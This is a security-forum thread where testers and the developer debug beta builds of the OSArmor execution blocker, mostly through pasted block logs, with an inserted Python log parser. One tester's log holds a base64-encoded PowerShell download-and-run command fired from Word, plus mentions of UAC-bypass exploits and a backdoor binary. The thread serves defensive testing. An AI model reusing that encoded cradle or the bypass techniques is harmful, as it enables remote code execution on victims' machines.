NoVirusThanks OSArmor: An Additional Layer of Defense

Discussion in 'other anti-malware software' started by novirusthanks, Dec 17, 2017.

  1. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,560
  2. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    ...(test24) all rules checked and no exclusions...
    Run executable file from desktop in default sandbox > ERP popup > OSA quiet.
    Run executable file from desktop > ERP popup > OSA popup Suspicious Process Blocked - Block execution of unsigned processes on Desktop folder.
    Date/Time: 1/16/2018 4:02:13 PM
    Process: [9024]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows

    Date/Time: 1/16/2018 4:05:17 PM
    Process: [5812]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows

    Date/Time: 1/16/2018 4:29:33 PM
    Process: [8176]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows

    Date/Time: 1/16/2018 4:43:30 PM
    Process: [8320]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows

    Date/Time: 1/16/2018 4:53:00 PM
    Process: [2464]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows

    Date/Time: 1/16/2018 4:53:15 PM
    Process: [6752]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
    Parent: [4300]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
    Signer:
    Parent Signer: Microsoft Windows
     
    Last edited: Jan 16, 2018
  3. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    ...(test24) all rules checked and no exclusions...
    Run executable file from desktop in default sandbox > ERP popup > OSA popup Suspicious Process Blocked - Block execution of unsigned processes on Local AppData.
    Date/Time: 1/16/2018 6:48:03 PM
    Process: [7880]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
    Parent: [6900]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Date/Time: 1/16/2018 6:48:04 PM
    Process: [8612]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\HD-zip.exe
    Parent: [6900]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSC4B8.tmp\HD-zip.exe" -r archive.zip *
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Date/Time: 1/16/2018 6:53:28 PM
    Process: [9148]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\7zr.exe
    Parent: [1620]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Date/Time: 1/16/2018 6:53:29 PM
    Process: [3520]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\HD-zip.exe
    Parent: [1620]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\7zSBD5D.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSBD5D.tmp\HD-zip.exe" -r archive.zip *
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Date/Time: 1/16/2018 7:29:08 PM
    Process: [3836]D:\Sandbox\bjms\Test\user\current\AppData\Local\Temp\is-NDDC6.tmp\filmora_64bit_full846.tmp
    Parent: [10948]D:\Sandbox\bjms\Test\user\public\Documents\Wondershare\filmora_64bit_full846.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\is-NDDC6.tmp\filmora_64bit_full846.tmp" /SL5="$DC04A4,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files (x86)\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files (x86)\Wondershare\Wondershare Filmora\"
    Signer:
    Parent Signer: Wondershare Technology Co.,Ltd

    Date/Time: 1/16/2018 7:49:14 PM
    Process: [9820]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\is-9ERVV.tmp\filmora_64bit_full846.tmp
    Parent: [6092]D:\Sandbox\bjms\Default\user\public\Documents\Wondershare\filmora_64bit_full846.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\is-9ERVV.tmp\filmora_64bit_full846.tmp" /SL5="$7A0640,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
    Signer:
    Parent Signer: Wondershare Technology Co.,Ltd

    Date/Time: 1/16/2018 7:50:46 PM
    Process: [3444]D:\Sandbox\bjms\Test\user\current\AppData\Local\Temp\is-PFHLF.tmp\filmora_64bit_full846.tmp
    Parent: [10712]D:\Sandbox\bjms\Test\user\public\Documents\Wondershare\filmora_64bit_full846.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\is-PFHLF.tmp\filmora_64bit_full846.tmp" /SL5="$7104C0,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
    Signer:
    Parent Signer: Wondershare Technology Co.,Ltd

    Date/Time: 1/16/2018 7:52:17 PM
    Process: [10612]D:\Sandbox\bjms\Default\user\current\AppData\Local\Temp\is-GFQBP.tmp\filmora_64bit_full846.tmp
    Parent: [6636]D:\Sandbox\bjms\Default\user\public\Documents\Wondershare\filmora_64bit_full846.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\is-GFQBP.tmp\filmora_64bit_full846.tmp" /SL5="$5004A0,215094197,361984,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\bjms\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Program Files\Wondershare\Wondershare Filmora\" /DIR="C:\Program Files\Wondershare\Wondershare Filmora\"
    Signer:
    Parent Signer: Wondershare Technology Co.,Ltd
     
    Last edited: Jan 16, 2018
  4. askmark

    askmark Registered Member

    Joined:
    Jul 7, 2016
    Posts:
    392
    Location:
    united kingdom
    I'm not able to reproduce, as OfficeC2RClient.exe doesn't appear to run manually and instead runs when an update is being processed. It may have just been bad timing on my part.

    VoodooShield was installed at the time, but only the service was running. The GUI process itself was not active and had been closed. As far as I know VS relies on the GUI process for all process activity.
     
  5. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    Here is a new v1.4 (pre-release) (test25):
    http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test25.exe

    *** Please do not share the download link; we will delete it when we release the official v1.4 ***

    So far this is what's new compared to the previous pre-release:

    + On Configurator -> Settings -> Enable internal rules for allowing safe behaviors (checked)
    ** The above option was requested by a company so they can disable it and use only their exclusions **
    ** We highly recommend that all users keep the above option always checked **
    + On Configurator -> Settings -> Set notification window always on top (checked)
    + On Configurator -> Advanced -> Block reg.exe from disabling UAC (unchecked)
    + On Configurator -> Advanced -> Block execution of processes on Public Folder (unchecked)
    + On Configurator -> Advanced -> Block processes executed from RuntimeBroker (unchecked)
    + On Configurator -> Advanced -> Block execution of SubInACL.exe (unchecked)
    + On Configurator -> Advanced -> Block execution of Shutdown.exe (unchecked)
    + On Configurator -> Advanced -> Block execution of At.exe (unchecked)
    + Added new internal rules to block suspicious processes
    + Many fixes and improvements

    Here are two new videos:
    Another XLS (Excel) Payload Blocked by OSArmor
    Request.doc Exploit Payload Blocked by OSArmor

    @bjm_

    Should be fixed in test 25, thanks for reporting.

    @askmark

    If you notice again that issue (Configurator can't be opened) please let me know.

    Also please update VS to 4.16 (some users reported the Configurator issue as fixed within that new version).

    @Buddel

    We added some improvements, but please note that sometimes (i.e. when processes are executed) it may use from 1 to 10% of CPU for 1 second (or similar).

    That is because it makes some internal checks to validate the process signature, etc.

    As long as the CPU goes back to 0% there are no issues (nothing to worry about).

    However, we may further improve this in the next version by implementing a caching system.

    //Everyone

    We noticed an issue when switching from Admin->LUA->Admin:

    - Power on the PC and select the Admin account (OSArmor icon is present)
    - Switch to a LUA user (OSArmor icon is present)
    - Switch back to Admin user (OSArmor icon is not present)

    We'll fix this on the next build.
     
  6. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    Um, @novirusthanks .... if you're referring to #652, my observation with (test25) is the same as #652.
     
  7. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @bjm_

    Build 25 now properly detects the Temp folder when "Block unsigned processes on Temp folder" or "Block unsigned processes on Local AppData" is checked.

    It should not block processes on paths like:

    Code:
    D:\Sandbox\user\Default\user\current\AppData\Local\Temp\7zSC4B8.tmp\7zr.exe
    
    @BlackBox Hacker

    You have quoted test 24, the last post I made is for test 25.

    Also please consider editing your post instead of creating a new one with the same quoted text and just one line of text, thanks :)

    Else it is difficult for other users to scroll the thread :thumb:

    That is not an issue; you can enable the blocking of unsigned processes on C:\ and other things via the Configurator -> Advanced tab.

    We'll decide what other options to enable by default prior to releasing the final v1.4.
     
  8. Is it possible to still load unsigned processes on the desktop, but still block them from any other system path? This is what I mean.
     
  9. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    Okay. I'll re-test #653. FWIW ~ I still think there's a hiccup in #652.
    Thanks
     
  10. Very good, binary blocks on root 'c:\' but didn't block in folder C:\Windows?
     
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @BlackBox Hacker

    A process needs Admin rights to drop an exe file on C:\WINDOWS\, \System32\, etc.

    @bjm_

    That is correct, because a process inside the Sandbox is opened from:

    Code:
    C:\Sandbox\User\DefaultBox\user\current\Desktop
    
    That is not the user Desktop folder:

    Code:
    C:\Users\User\Desktop
    
     
  12. I could test one of my UAC exploits to see if code will copy? Plus I think you should add DLL Blocking!
     
  13. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    (screenshot attachment: 2286.png)
    Edit: ...and when I move the file into a new desktop folder, then Run Sandboxed that folder, then launch the executable from the sandboxed folder, OSA speaks to me.
     
    Last edited: Jan 17, 2018
  14. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @bjm_

    Can you share a sample log?

    I tried this:

    1) I create a folder at C:\Users\Dev\Desktop\New Folder
    2) I place an unsigned exe inside that folder and double-click it -> OSA blocked it:

    If I right-click on C:\Users\Dev\Desktop\New Folder\7z.exe and then select "Run Sandboxed", OSA doesn't block it.

    That is because it runs inside the Sandbox and OSA does not recognise:

    as the user Desktop folder (test 25).
     
  15. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Hi Andreas

    This was a no go for me. Uninstalled 24, and installed 25. Install looked fine, but it never came up. No tray icon, and when I opened it with the desktop icon it showed disabled. Right clicking on it didn't enable it. Tried twice. Did a restore, before my brain said logs.

    Anything you want me to try?

    Pete
     
  16. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Is recognizing the sandbox on your to-do list? Remember you had to do that for ERP.
     
  17. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    (test25)
    Date/Time: 1/17/2018 7:49:10 PM
    Process: [6040]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe
    Parent: [3028]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe" x "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\client.zip" -o"C:\ProgramData\BlueStacksSetup\Client" -aoa
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Date/Time: 1/17/2018 7:49:11 PM
    Process: [6208]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\HD-zip.exe
    Parent: [3028]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\BlueStacks-Installer_3.55.70.1783.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\HD-zip.exe" -r archive.zip *
    Signer:
    Parent Signer: BlueStack Systems, Inc.

    Yes, same sample with "Run Sandboxed", OSA doesn't block it.
     
    Last edited: Jan 17, 2018
  18. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @Peter2150

    Can you try to uninstall it, reboot, delete C:\Program Files\NoVirusThanks\OSArmorDev\ and then install test 25?

    Not for v1.4, but maybe for the next version.

    @BlackBox Hacker

    We can add a new rule like "Block non-system and unsigned processes on Windows folder".

    It will also block non-system and unsigned processes in subfolders, of course.

    @bjm_

    That block event is correct for the rule "Block execution of unsigned processes on Local AppData".

    It also blocks processes in subfolders, and \Temp\ is a subfolder of Local AppData.

    That is correct.
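
Added example, not OSArmor's code or any poster's: a small Python parser for the block-event records quoted in this thread, plus a replay of the folder rules as the developer describes them in the posts above (a match on the real profile folder, subfolders included), showing why an unsigned helper under \AppData\Local\Temp\ is blocked while the same file launched from a Sandboxie copy of the Desktop is not. The sample records, the profile path C:\Users\bjms and the prefix-match reading of the rules are assumptions.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the record format OSArmor writes and the posters
# pasted above: an unsigned helper extracted by a signed installer, run from
# \AppData\Local\Temp\, then an unsigned exe double-clicked on the Desktop.
SAMPLE_LOG = r'''
Date/Time: 1/17/2018 7:49:10 PM
Process: [6040]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe
Parent: [3028]C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\Installer.exe
Rule: BlockUnsignedProcessesAppDataLocal
Rule Name: Block execution of unsigned processes on Local AppData
Command Line: "C:\Users\bjms\AppData\Local\Temp\7zSB42A.tmp\7zr.exe" x client.zip
Signer:
Parent Signer: BlueStack Systems, Inc.

Date/Time: 1/16/2018 4:02:13 PM
Process: [9024]C:\Users\bjms\Desktop\Windows ISO Downloader.exe
Parent: [4300]C:\Windows\explorer.exe
Rule: BlockUnsignedProcessesOnDesktop
Rule Name: Block execution of unsigned processes on Desktop folder
Command Line: "C:\Users\bjms\Desktop\Windows ISO Downloader.exe"
Signer:
Parent Signer: Microsoft Windows
'''

@dataclass
class BlockEvent:
    when: str
    pid: int
    process: str
    parent_pid: int
    parent: str
    rule: str
    rule_name: str
    command_line: str
    signer: str
    parent_signer: str

    @property
    def unsigned(self) -> bool:
        # OSArmor leaves "Signer:" empty when the image carries no signature.
        return self.signer == ""

def _split_pid(field: str):
    # "[6040]C:\path\to.exe" -> (6040, "C:\path\to.exe")
    pid, _, path = field.lstrip("[").partition("]")
    return int(pid), path

def parse_events(text: str) -> List[BlockEvent]:
    """Split the log on blank lines and read each 'Key: value' record."""
    events: List[BlockEvent] = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        for line in chunk.splitlines():
            key, _, value = line.partition(":")  # first ':' only; paths keep theirs
            fields[key.strip()] = value.strip()
        pid, proc = _split_pid(fields["Process"])
        ppid, parent = _split_pid(fields["Parent"])
        events.append(BlockEvent(
            when=fields["Date/Time"], pid=pid, process=proc,
            parent_pid=ppid, parent=parent, rule=fields["Rule"],
            rule_name=fields["Rule Name"], command_line=fields["Command Line"],
            signer=fields.get("Signer", ""),
            parent_signer=fields.get("Parent Signer", "")))
    return events

def folder_rule(process_path: str, user_profile: str) -> Optional[str]:
    r"""Replay the folder rules as the thread describes them (assumption: a
    case-insensitive prefix match on the real profile folder, subfolders included,
    so \AppData\Local\Temp\ is "Local AppData"; a Sandboxie copy of the Desktop,
    D:\Sandbox\...\Desktop, has a different prefix, so no folder rule fires).
    """
    p = process_path.lower()
    profile = user_profile.lower().rstrip("\\")
    rules = [
        ("BlockUnsignedProcessesOnDesktop", profile + "\\desktop\\"),
        ("BlockUnsignedProcessesAppDataLocal", profile + "\\appdata\\local\\"),
    ]
    for name, prefix in rules:
        if p.startswith(prefix):
            return name
    # Root-folder rule: the image sits directly under a drive root (C:\tool.exe).
    if re.fullmatch(r"[a-z]:\\[^\\]+", p):
        return "BlockProcessesOnRootFolders"
    return None

def installer_helper_blocks(events: List[BlockEvent]) -> List[str]:
    """Unsigned images run by a signed parent from the same folder: the
    installer-extracts-helper pattern (BlueStacks, Wondershare) behind most
    blocks in this thread, and the usual candidate for a reviewed exclusion."""
    return [e.process for e in events
            if e.unsigned and e.parent_signer
            and ntpath.dirname(e.parent).lower() == ntpath.dirname(e.process).lower()]
```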
     
  19. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    So, my observation with (test24) in #653 (OSA recognizing the sandboxed file) was fixed with (test25).
     
  20. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
     
  21. (quoting novirusthanks)

    We can add a new rule like "Block non-system and unsigned processes on Windows folder".

    Will block non-system and unsigned processes also on subfolders of course.

    That would be really great!
     
  22. I've never seen this, which is very cool: an exploit that is blocked half way but still has a UAC copy bypass that still works! Plus I have also found another way to drop on the hard drive without this exploit, which will always bypass OSArmor protection. Only three UAC exploits still work; all the rest are blocked, very good! I was very sneaky in making these exploits work: all I did was compile most of them from script form. If you can block unknown executable files executing from the locations 'C:\Windows' and 'C:\Windows\system32' then you would have secured UAC from exploits, nice.

    Log:
    Code:
    Date/Time: 18/01/2018 00:09:36
    Process: [2488]C:\RemoteDll32.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockProcessesOnRootFolders
    Rule Name: Block unsigned processes located on root folder (i.e C:\)
    Command Line: "C:\RemoteDll32.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:12:14
    Process: [3284]C:\Users\BlackBox\RemoteDll32.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockProcessesOnSuspiciousFolders
    Rule Name: Block processes located in suspicious folders
    Command Line: "C:\Users\BlackBox\RemoteDll32.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:13:08
    Process: [1864]C:\Users\BlackBox\Music\RemoteDll32.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockProcessesOnSuspiciousFolders
    Rule Name: Block processes located in suspicious folders
    Command Line: "C:\Users\BlackBox\Music\RemoteDll32.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:17:55
    Process: [2660]C:\Windows\System32\cmd.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockBATScripts
    Rule Name: Block execution of .bat scripts
    Command Line: C:\Windows\system32\cmd.exe /c ""C:\Users\BlackBox\Desktop\test.bat" "
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:18:00
    Process: [2512]C:\Windows\System32\wscript.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockVbsScripts
    Rule Name: Block execution of .vbs scripts
    Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\test.vbs"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:19:01
    Process: [1068]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Parent: [2264]C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Rule: AntiExploitMicrosoftWord
    Rule Name: (Anti-Exploit) Protect Microsoft Word
    Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAGMAIAAiAGkAZQB4ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADUALwBzAHkAcwB0AGUAbQAuAHAAcwAxACcAKQAiAA==
    Signer:
    Parent Signer: Microsoft Corporation
    
    Date/Time: 18/01/2018 00:22:05
    Process: [2836]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
    Parent: [1412]C:\Users\BlackBox\Desktop\exploit.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:24:19
    Process: [3740]C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe
    Parent: [2116]C:\Users\BlackBox\Downloads\vbsedit.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe" -o"C:\Users\BlackBox\AppData\Local\Adersoft\Installation" -p123VBSEDIT987 -y
    Signer:
    Parent Signer: Adersoft
    
    Date/Time: 18/01/2018 00:26:04
    Process: [3740]C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe
    Parent: [3892]C:\Users\BlackBox\Downloads\vbsedit.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\BlackBox\AppData\Local\Adersoft\Installation\vbsedit7zip.exe" -o"C:\Users\BlackBox\AppData\Local\Adersoft\Installation" -p123VBSEDIT987 -y
    Signer:
    Parent Signer: Adersoft
    
    Date/Time: 18/01/2018 00:39:25
    Process: [1800]C:\Windows\System32\mmc.exe
    Parent: [832]C:\Windows\System32\dllhost.exe
    Rule: BlockMSCScripts
    Rule Name: Block execution of .msc scripts
    Command Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\wf.msc"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:40:29
    Process: [1228]C:\Windows\System32\mmc.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockMSCScripts
    Rule Name: Block execution of .msc scripts
    Command Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:45:56
    Process: [4024]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
    Parent: [1508]C:\Users\BlackBox\Desktop\exploit.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 00:47:32
    Process: [3292]C:\Windows\System32\cmd.exe
    Parent: [3800]C:\Windows\System32\eventvwr.exe
    Rule: AntiExploitMicrosoftEventViewer
    Rule Name: (Anti-Exploit) Protect Microsoft Event Viewer
    Command Line: "cmd.exe" /cC:\Users\BlackBox\Desktop\installer.exe
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 01:58:14
    Process: [2976]C:\Users\BlackBox\Desktop\New Projects\Secure Backdoor 2.0.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: "C:\Users\BlackBox\Desktop\New Projects\Secure Backdoor 2.0.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 01:58:45
    Process: [3788]C:\Windows\System32\dllhost.exe
    Parent: [672]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:00
    Process: [652]C:\Windows\System32\taskeng.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: taskeng.exe {25DCCDC9-F0E6-41ED-B520-AF5541AC6A57} S-1-5-18:NT AUTHORITY\System:Service:
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:03
    Process: [3424]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1162 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:07
    Process: [2728]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:10
    Process: [3760]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:11
    Process: [2832]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:13
    Process: [3960]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
